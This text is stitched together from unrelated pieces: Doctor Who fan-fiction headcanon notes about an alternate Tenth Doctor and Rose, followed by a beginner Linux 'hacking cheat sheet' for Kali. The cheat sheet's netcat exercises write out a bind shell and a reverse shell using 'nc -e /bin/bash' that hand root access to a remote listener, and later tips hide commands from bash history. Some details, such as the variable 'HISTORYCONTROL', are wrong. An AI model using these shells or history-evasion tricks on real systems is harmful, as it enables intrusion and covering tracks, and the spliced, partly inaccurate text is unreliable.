This alternative version of the time lord attempted to have a child with Rose initially when they traveled together to no avail during her universe’s version of this. Also, unintentionally unlocked a bit of the Bad Wolf entity, now being able to age extremely slow much to the horror of both. Now Rose has “nightmarish” dreams where she becomes the entity whenever they end up having sex when there is a lack of mental connection between her and him.

This version actually said “I love you” at the same time Rose ends up blurting it out because she couldn’t find the words to say goodbye. This version is where she becomes a heiress and as a result, a celebrity for the new Vitrex Industries.

Journey’s End is when Rose chose the Doctor instead of the Meta Crisis, giving him her status in her earth alternatives’s Torchwood. This is also where Donna, instead of getting her memory wiped, ends up wearing the Chameleon Arch to rewrite her human DNA to that of a Gallifreyan’s own. She still passes out and ends up back home with a piece of the Tardis of her own.

Ends up getting separated from Rose again, which is the current situation.

When he was supposed to die saving Wilfred Mott, instead he set up a meeting an earlier version of the crew of Teselecta, granting the ship they were now known for as he used their last ship to save Wilfred instead of himself as foretold. It also saved the crew a lot of money if they were to deliver the scrap ship for repairs, abandoning it entirely.

While looking for Rose, this version of Tenth Doctor also landed in Amy’s backyard when she was a child, traveling with an adult Amy, Rory, and River as a result. Meets @girl-in-the-tardis Kira, a general the same time he meet River at the Angel Planet (i’ll go back later and change this when i remember the name of it).

Meets Clara as a Dalek and for once, actually traveled with a Dalek!Clara. Gave her a Dalek Puppet body for this work, in her image. Eventually, she left when she wanted to work with UNIT in building armor for military and technological defense systems after Amy and Rory’s deaths. He ends up losing them the same way that happened with the Eleventh Doctor in canon. Sees a vision of his Rose. Marries River and Kira off, horrible plan of The Wedding of River Song, except General Kira ducks when it comes to the kiss, leaving ten to get kissed by River and setting the world back to when the Teselecta is killed by River. Gives the crew another ship as a result.

Meets a young Victoria that was born near the Rift, ends up being a young Victoria. Only watched from afar by this Tenth Doctor.

Later meets Governess!Clara and played out the same way it happened with Eleventh Doctor. When facing Dr. Simeon, he commented on the fact that he looked like his Ninth self when he fell into the Rift without a TARDIS that one time. Sees a vision of Rose dressed in Victorian wear, ends up losing her after chasing her for almost five blocks straight. Extra TARDIS grows for the clone that is to come.

Meets the real Clara later. Avoids his death by unintentionally cutting off his opposite hand when fighting wooden Cybermen and poured his regenerative energy in that hand. The other hand grows into the Eleventh incarnation instead of being a twin. Both Travel together before given a the fully grown TARDIS. With a new set of regenerations, he was more than ever set on finding Rose with Clara. The clone regenerates into Twelve. Clara meets Danny Pink and falls for him. Pink still acts the same towards him but, Ten doesn’t act the same as Twelfth incarnation. Ends up losing both the same way in canon. Also meets the Master (Simm) since Missy was the most constant regeneration in his universe vaguely turning into the canonical faces of past Masters but, never met the Simm!goatee version, getting kissed by him and recovers quickly by it. Even more so when finding out about the other’s identity. Meets River for one last time. Clone ends up getting memories of these adventures and ends up meeting Bill. This Tenth Doctor traveled with Bill’s Mother and Twelfth Doctor (clone).

Travels with Bill and Nardole. Ends up avoiding death again with the crew of Teselecta, a new crew this time. The clone regenerates into 13.

Travels still, now with Grace. Grace dies. Now, it’s Yaz, Ryan, 13 and Graham. Also new TARDIS desktop and exterior color. At this point, he’s considered stubborn for not changing face by the clone. Tenth Doctor ends up traveling alone and it is the clone that ends up traveling with Yaz, Graham, and Ryan (experiencing canon adventures).

Rose comes back permanently finally meeting a now bearded Tenth Doctor. When Rose eventually came back permanently, they traveled back to her alternate universe to meet up with her mum and dad and brother, living domestic since the clone version of him was handling herself well (the Meta-Crisis version of him ended up getting married to that universe’s Jack and Ianto due to the Donna side of him winning out).

Cue the onslaught of interviews and press of the daughter returning with a man around her arm and a married ring around her finger and the constant question of her having a baby or not. Because of this, this alternate Doctor and Rose, tried again within the TARDIS, the “human way” and it was successful with a daughter. Still, all of them travel together and he works at UNIT while Rose works with Torchwood alongside her techincal-brother-in-law.

Hacking Cheat Sheets Part 3: Linux

Here is a little primer on some basic Linux, which is important for hacking

Linux Operating System

Identifying Users and Processes

INIT process ID 1 Root UID, GID 0 Accounts for services 1-999 All other users Above 1000

ring 0 in the security rings model, is where the kernel lies in linux ring 1 and ring 3 is where device drivers lie ring 3 is the users space and this is where init is and applications, etc.

init executes scripts to setup all non-os services and structures for the user environment. it also checks and mounts the file system and spawns the gui if its configured to do so. it will then present the user with the logon screen. init scripts are usually located in the etc/rc..../

</> is the root directory, this is where the linnux file system begins. every other directory is underneath it. do not confuse it with teh root account or the root accounts home directory

</etc> these are the config files for the linux system. Most are text files and can be edited

</bin> and </usr/bin> these directories contain most of the binaries for the system. The /bin directory contains the most important programs : shells, ls, grep. /usr/bin contains other applications for the user.

</sbin> and </usr/sbin> most system administration programs are here

</usr> most user applications, their source code, pictures,docs,and other config files. /usr is the largest directory on a linux system

</lib> the shared libraries (shared objects) for programs that are dynamicaly linked are stored here

* </boot> boot info is stored here. the linux kernel is also kept here, the file vmlinuz is the kernel

* </home> where all the users home directories are. every user has a directory under /home and its usually where they store all their files

* </root> the superusers (root) home directory

* </var> contains frequently changed variable data when the system is running. also contains logs (/var/log), mail ( /var/mail), and print info (/var/spool)

* </tmp> scratch space for temporary files

* </dev> contains all device info for the linux system. Devices are treated like files in linux, and you can read/write to them just like files (for the most part)

* </mnt> used for mount points. HDs , usbs, cd roms must be mounted to some directory in the file system tree before being used. Debian sometimes uses /cdrom instead of /mnt

* </proc> this is a special and interstinng directory. its actually a virtual directory because it doesnt actually exist. it contains info on the kernel and all processes info. contains special files that permit access to the current configuration of the system

file permissions are specified in terms of the permissions of 1. the file owner (self) 2. the files group members (group/business) 3. and everyone else (other)

* she-bang is #! and you would use this when writing a shell script at the beginning of the script. You will need to point it to teh interpreter which in linux bash is #!/bin/sh

• Ls to list whats in the directory, ls -la for hidden files • When using cd to change directories remember the 2 ways is absolute path and relative path. Absolute path is in relation to the root directory, so if I wanted to change to the desktop from anywhere I type the absolute path to the desktop which is cd /root/desktop. If I was in the root directory I could use the relative path to the desktop (that is relative to your current location) with cd Desktop (it is case sensitive). The command cd .. takes you one level back in the filesystem • Man pages: to learn more about the ls command you can do man ls and that will list the man page about it. Q quit • Adding a user: by default the kali login is a privileged account because many tools require root to run. You should add an underprivileged account for everyday use. Adduser ray this will add a user and put it in group 1000 and create a home directory at /home/ray. It will then ask for a password twice, put one in. then it will ask for extra values optional like full name, work number , etc. Now I may need to do something as root as my regular user so I need superuser privileges added to my new user. We do that with adduser ray sudo . now if I want to switch to my regular user I do su ray . lets say I want to test if its underprivileged, try typing in adduser smojoe and see that it says command not found, that’s because we are underprivileged. Now try sudo adduser smojoe and put your password it and see that you can now add the user. If you want to switch back to root type su, then the root password which by default is toor. To change your root password type passwd and hit enter, then type in the new password twice. • Creating a new file: to make a new empty file type touch raysfile . • Make a new directory: mkdir raysdirectory • Copying, moving and removing files: to copy a file use the cp command with the syntax of cp source destination: cp /root/raysfile raysfile2. To move a file its identical to copy except you use mv: mv /root/raysfile2 /root/raysdirectory. To remove a file type rm raysfile2. (side note , rm -rf deletes the entire filesystem because the r removes recursively) • Adding text to a file: echo by itself will just repeat what you type in the terminal window. So echo im captain awesome will repeat this phrase back to you in the terminal. To put it in a file you use the > redirect command: echo im captain awesome > raysfile. To see the contents of it you type: cat raysfile. Now lets say I want to add more text to it, if you type echo im captain awesome again > raysfile and then cat it, you will notice that it overwrote what was there previously. We need to append with >> instead of the single >. So the command would be: echo im captain awesome a third time >> raysfile. Cat that and you will see it appended it to a new line • File permissions: lets see what permissions my file has: ls -l raysfile. From left to right its first the file type (if it’s a directory or a file) then it’s the permissions (-rw-r-r--) then the number of links to the file (1), then the user and group that own the file (root), then the file size (however many bytes), then the last time the file was edited (the date and time) and finally the name of the file (raysfile). For permissions linux has read (r), write (w), and execute (x). there is also 3 sets of user permissions for owner, group, and all users. So the first 3 parts are for owner, the next 3 are for group and the final 3 are for all users. So the -rw-r-r—means that the owner gets read/write, the group gets read only, and all other users get read only. Because I made the file while logged in as root you will see root root after the permissions. To change permissions for a file use the chmod command, when specifying the permissions use number 0-7. So they would be like: o 7 full permissions 111 binary o 6 read and write 110 binary o 5 read and execute 101 binary o 4 read only 100 binary o 3 write and execute 011 binary o 2 write only 010 binary o 1 execute only 001 binary o 0 none 000 binary • Chmod: so lets say I want to give the owner execute, read and write and the group and everyone else gets no permissions I would do chmod 700 raysfile. This is because the order for that in the binary of 111 is rwx as in read first then write then execute. The first initial dash – is stating that it’s a file, if it had a D there it would indicate that it is a directory. • you can also do it by letter notation where: u = user owner, g = group owner, o = others or world, and a = all. so for example, if the file is already rwx------ and then i type chmod g+w, then it would read rwx-w----, meaning i added (+) the write capability to the group section. if i did chmod a+x that would now read rwx-wx--x meaning everybody (owner, group and world) have execute privileges now. if i did chmod a-x, now it would read rw--w---- meaning i have removed the execute privilege from everyone. • Editing files: your not always going to have a gui text editor, especially when you break into a linux and get shell, so you need to be familiar with the shell version editors like nano and vi. So if I want to make a new file and edit it simultaneously I would type: nano testfile.txt. once this opens up you can start entering text (enter in chuck Norris knows victorias secret)and when your done you do ctrl-x and it will ask you if you want to save it, type Y and hit enter. Lets bring that testfile back up by typing nano testfile.txt again, now lets do a search for the word chuck. Do a ctrl-w and in the box type chuck and hit enter, it should bring the flashing cursor to the c in chuck. Ctrl-x again and hit y to save and enter. Now lets try vi editor, type vi testfile.txt. in its current state you cant enter text yet because you have to hit I (as in the letter i) to insert and start adding text. Add some text to the file, when your done hit escape to come back to command mode, here you can do stuff like delete words by positioning the cursor over a letter and hitting D and depending on which arrow key you do it will delete the letter. For example the word test, if the cursor is over the “e” and I hit d and then right arrow it deletes the “e”. now the cursor is over the “s” and the word says “tst”. If I hit D while the cursor is over the “s” and hit my left arrow it deletes the “t”, keeping the “s” intact. Kinda weird stuff, I prefer nano. If you position the cursor on a line and hit dd it will delete the whole line. To exit vi and to write the changes to the file you type :wq , w for write and q for quit. To learn more about these look to the man pages. • Data manipulation: lets make a file with touch raystest and make it look like below: 1 warrior favorite 2 300 favorite2 3 braveheart favorite3 • Grep: now lets find all instances of a word, type: grep favorite raystest. This should output all 3 lines, now lets type: grep warrior raystest, this should output just the line that has warrior on it. Notice how it dumps the whole line not just the word. Now lets just find and output a word from the file using the pipe command. Type: grep warrior raystest | cut -d “ “ -f 2 in this command the -d is for delimiter, which in this case would be the space that’s in the line (1 warrior favorite), and the -f is the field in that line, being the second column. So its saying that in the second column if there is a word called warrior then output it to screen (warrior, 300 and braveheart are in the second column). Notice that if you rerun that command and change the -f 2 to a -f 3 it will output the word “favorite”, this is because it found the word warrior, so take that line and give me the value of whats in the 3rd column. • Sed: you can also use sed to manipulate the data based on certain patterns and expressions. So lets say I had a long file and I needed to replace every instance of a certain word, sed is what you can use. With sed a / is the delimiter character, so lets say I wanted to replace every instance of favorite with awesome, type: sed ‘s/favorite/awesome/’ raystest this should output the text from our file but now it will say awesome, awesome2, and awesome3 • Awk: you can use to do pattern matching, so lets say in my file I wanted to find entries in the first column that were higher than 1, I would type: awk ‘$1 > 1’ raystest this will output the 2nd and 3rd line of my file. Then if I only wanted it to say “1 warrior, 2 300, and 3 braveheart” thus omitting the favorite words, I would type: awk ‘{print $1,$2;}’ raystest thus telling it to print to screen only the first and second columns. • Starting services: when you do a fresh install of kali linux, postgresql and metasploit are not started by default, so if you want to start a service you type: service postgresql start, or service apache2 start, etc. now to make these start on bootup you have to manipulate the update-rc.d, so type: update-rc.d postgresql enable, then type in update-rc.d metasploit enable, now when you restart kali it will auto start these services • Setting up networking in kali: ifconfig is the command to list the same stuff ipconfig does. The command route will show you the routing tables including what your gateway is. So to set a static address just on the fly you find what your eth interface number is and type: ifconfig eth0 10.0.0.20/24 to put this in a class c address. To make sure the static address persists upon restarts you have to edit the file under /etc/network/interfaces. I just opened this in leafpad, note the auto lo, iface lo inet loopback lines, that’s for the loopback address. So comment out the next section which is probably the dhcp ones, right below it type in: auto eth0 iface eth0 inet static address 10.0.0.20 netmask 255.255.255.0 gateway 10.0.0.4

once that’s done, save it and then restart networking with the command: service networking restart

• To view network connections such as ports listening , etc, type: netstat -antp • Netcat: they call this the swiss army knife for hackers, lets do some exercises with it. First start by looking at the help file nc -h 1. Lets check to see what ports are listening,(first start the apache2 service) type: nc -v <the address of your kali machine> 80 2. If you had started the apache service you should see it shows there as open 3. You can also set up a listener port, type: nc -lvp 1234 4. The l here is for listen, the v is for verbose, the p is to specify the port to listen on 5. Lets open up a second terminal window and use netcat to connect to the listener 6. In the second terminal type: nc 10.0.0.100 1234 and hit enter 7. The first terminal should show you connected 8. Now lets chat from the second terminal by typing : sup and hit enter 9. The word “sup” should show on the first terminal 10. In the first terminal do the same and it should show up on the second terminal 11. Ctrl –c (by the way you could demo this by using metasploitable2 and kali as well) 12. Now lets say we want our listener (victim) to give the second terminal (attacker) a bash shell when they connect 13. On first terminal type: nc -lvp 1234 -e /bin/bash (the -e is to set an executable) 14. In the second terminal type: nc 10.0.0.100 1234 and hit enter 15. It wont show anything but give it a second (you may have to hit enter on the first terminal to get it to register that it connected) and in the second terminal window type in whoami in the terminal and it should show root 16. Type in “id” and you should see the uid, gid and groups all showing root (0) 17. Ctrl-c 18. In addition to giving a shell from the listener you can also push a shell back to the listener 19. On the first terminal type: nc -lvp 1234 20. On the second terminal type : nc 10.0.0.100 1234 -e /bin/bash (if doing this from win 7 replace /bin/bash with cmd.exe) 21. Back on your first terminal type in whoami and you should see root 22. Ctrl-c 23. Now lets send a file using netcat 24. In the first terminal type: nc -lvp 1234 > netcatfile (this is basically setting up an empty file on the listener to receive a file from the attacker and stuff it in this file) 25. In the second terminal type: nc 10.0.0.100 1234 < raystest (this is if you did the previous exercises) 26. Ctrl-c and now in the first terminal type: cat netcatfile, it should contain the same text from raystest (1 warrior favorite, etc)

* if i type history in bash it will show me all the commands that i recently typed. This is good for quick re commands but bad if a hacker gets a hold of this because it will also have the passwords i entered. so like if i was downloading with wget and i did like --user ray --password lamepassword http://somesite.com , this stuff gets logged in bash history. so how about we store our passwords in temporary variables like so: so for this we need to define a variable and we do this with the read command. read -e -s -p "pass?" password hitting enter should put us in an interactive prompt showing pass? and here is where we type in our password (you cant see it as you type it). -e is If the standard input is coming from a terminal, readline is used to obtain the line. -s is Silent mode. If input is coming from a terminal, characters are not echoed. -p mode is The prompt is displayed only if input is coming from a terminal. we can do echo $password to see the password i just typed. so now our wget command would look like this : wget --user ray --password "$password" http://somesite.com. run history again and see that the plain text password is not there.

* export HISTORYCONTROL=ignorespace is a way to get around having some stuff recorded in bash history. Now if i type a space (sometimes two spaces if it doesnt work) before my command it will not record it in bash history.

* also you can do export HISTIGNORE="pass:wget:ls" and now the history will ignore anything with the words pass, wget, and ls.

* if i type password=1234 then echo $password , it will echo that value of 1234. but if i do unset password, this will release the variable and when i type echo $password i get nothing

* if i want to delete something out of history i type history -d and then the number of that entry in history. so like history -d 15 will delete whatever is in the 15th history entry.

keyboard shortcuts: if im at the end of a line, hitting my home key brings me back to beginning. the end key will bring you back to the end of the line. control + U clears the whole line (as opposed to me backspacing all of it). control + L clears the screen.

lsof will show a list of open files. I can check all the details including the tcp connections and addresses of a firefox instance i have up and running by typing lsof -i -n -P | grep firefox. the -i option selects the listing of files any of whose Internet address matches the address specified in i. If no address is specified, this option selects the listing of all Internet and x.25 (HP-UX) network files. the -n option inhibits the conversion of network numbers to host names for network files. Inhibiting conversion may make lsof run faster. It is also useful when host name lookup is not working properly. the -P option inhibits the conversion of port numbers to port names for network files. Inhibiting the conversion may make lsof run a little faster. It is also useful when port name lookup is not working properly.

try netstat -tupac, lotsa info on your current connections

df command shows you the current free disk space, free command shows you the current free memory

pwd is print working directory

if i want to list all the stuff in Documents and list all the stuff in Pictures, I dont have to do 2 ls commands I just type ls Documents Pictures and it will show both (not backtrack but just regular ubuntu or similar distro

* ls -lt will add a time option to the list

* if i want to find out what type of file i have i type in file then the name of the file. example: file dateping.sh will tell me its a posix shell script

* less command lets me view a text files contents in terminal. Q will quit me out of there

* wildcards: if i wanted to move any files that start with the letters "up" i would type mv [up]*, now anything that starts with "u" , mv u*, now anything that starts with "u" and is the extension of .bin, mv u*.bin.

* filenames are case sensitive (like when moving and copying)

* spaces in filenames confuse bash as well

* two exclamation marks !! will run the last command

* type command will tell me what time of command im running. For instance if i wanted to see what type of command "type" is i type in type type, and it will show that its a shell builtin command

* which command will tell me where the commands are found. so if i type in which ls, it will show that the ls command is found in /bin/ls. it doesnt work for aliases to executables, like if i typed in which cd i get nothing as its just an alias for change directory

* help cd will tell me about the cd command

* mkdir --help will tell me help about mkdir

* man ls will give me the manual page for ls, I hit q to get out of it.

* apropos will show me all instances of a word , like apropos passwd.

* whatis will also tell me what a command is, whatis ls

* info will give me verbose info about a command

* i can chain commands together on the same line using semicolons between each command. So if i wanted to change to a directory and also look at its contents, then send me back to my working directory: cd /usr; ls;cd - would do this for me

* now lets say i wanted to make that last command an alias called foo, i would do alias foo='cd /usr;ls;cd -' now i can just type foo and it will run it. This will not persist when i close the terminal however. to make it permanent, gedit .bashrc and under the section that has aliases, put your alias there and save it. then close the current terminal and reopen it and you should be able to use it now with the alias name. if you do type myfoo you will see all the commands that are strung. You can move that bashrc file to other machines to persist your aliases across other machines

* unalias foo will take away that alias

* all the programs in the terminal give you some sort of output, whther it be a result or an error message. these are sent over to a file called standard output, stdout for short. that messages to a file called standard error, stderr for short. by default these files arent saved to the disk. the keyboard is automatically tied to the stdin , which is standard input. so we can change where the output goes and where the input comes from, rather than just the keyboard. so if i did ls -l /usr/bin in the terminal it will print to screen, but if i do ls -l /usr/bin > ls-output.txt, it will output it to a text file. Now if i had this file and typed ls -l /bin/usr > ls-output.txt, this will give an error because /bin/usr doesnt exist. This will also overwrite whatever was previously in the ls-output.txt file. this means it will be empty because it will have started writing to it , but stopped when it got this error. now if i want to append files to an existing one and not overwrite the data in it it use >> so like ls -l /usr/bin >> ls-output.txt, and then ls -l /usr/bn >> ls-output.txt will make this file doubled in size.

* cat is used to display the results as well, like cat ls-output.txt will print to console all of the content in that file. i can also use it to concatenate or join various files that are in succession. example, if i had movie.avi.001, movie.avi.002, and movie.avi.003 and i wanted to join them together i would type cat movie.avi.0* > movie.avi. I can also use cat to make content for a new text file. So if i type cat > newtext.txt and hit enter it will just wait there for input. So if i type the words this is a test and hit enter then type of the broadcast network and hit ctrl + d, ctrl + d , it will bring me back to the prompt. then if i open that text file it will have the content in there as i typed it.

* echo with a letter then an asterix will show you all the files in your current directory that start with that letter. echo *p will show all the files in this directory that start with p. this is also case sensitive. echo [[:upper:]]* will show everything in this dir that is uppercased.

* to find hidden files iin the directory your in : ls -d .[!.]?* you could also use ls -la
